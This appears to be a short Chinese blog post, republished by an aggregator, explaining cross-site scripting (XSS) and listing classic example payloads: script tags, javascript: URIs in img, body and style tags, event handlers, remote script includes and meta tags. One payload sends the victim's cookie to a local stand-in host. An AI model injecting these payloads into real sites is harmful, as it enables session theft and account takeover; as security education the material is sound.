聊一聊黑客常说的XSS漏洞攻击

Posted 酷黑族

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了聊一聊黑客常说的XSS漏洞攻击相关的知识,希望对你有一定的参考价值。

经常看一些黑客文章说XSS漏洞攻击,那到底XSS是什么呢?怎么利用呢?酷哥今天就给大家聊一聊XSS.

XSS(Cross Site Scripting)即跨站脚本攻击,是一种常见于web application中的计算机安全漏洞。XSS通过在用户端注入恶意的可运行脚本,若服务器端对用户输入不进行处理,直接将用户输入输出到浏览器,则浏览器将会执行用户注入的脚本。

常用XSS方式分为以下几种:

1.      输入框中直接输入恶意脚本,如:

><script>alert(document.cookie)</script>

或者 "> <script> document.location.href='http://127.0.0.1:9090/xss?foo='+document.cookie</script>

2.      输入框中输入html标签,在标签中嵌入恶意脚本,如src,href,css style等。

<IMG SRC="javascript:alert('XSS');">;

<img width="0" height="0" />

<BODY BACKGROUND="javascript:alert('XSS')">

<STYLE>li {list-style-image:url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

3.      将恶意脚本注入在event事件中,如onClick,onBlur,onMouseOver等事件。

<a onmouseover="alert(document.cookie)">xxslink</a>

4.      在remote style sheet,javascript中,如

<LINK REL="stylesheet"HREF="javascript:alert('XSS');">

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

5.      META 标签,如

<meta http-equiv="refresh"content="5" />

<META HTTP-EQUIV="Set-Cookie"Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

这些代码,可能没有学过编程的朋友会一脸懵逼,为了能让大家更加直观的了解酷哥也给大家找了一篇网易安全中心发布的一篇关于XSS的文章。点击左下角阅读原文即可查看。


以上是关于聊一聊黑客常说的XSS漏洞攻击的主要内容,如果未能解决你的问题,请参考以下文章

Web安全我们常常在说的XSS漏洞到底是怎么回事?

我们常常在说的XSS漏洞到底是怎么回事?

黑客渗透笔记 跨站脚本攻击xss直接拿后台

黑客教程之能实现键盘记录的XSS

白帽黑客的进阶之路——​CSRF漏洞

黑客利用XSS漏洞,可访问谷歌的内部网络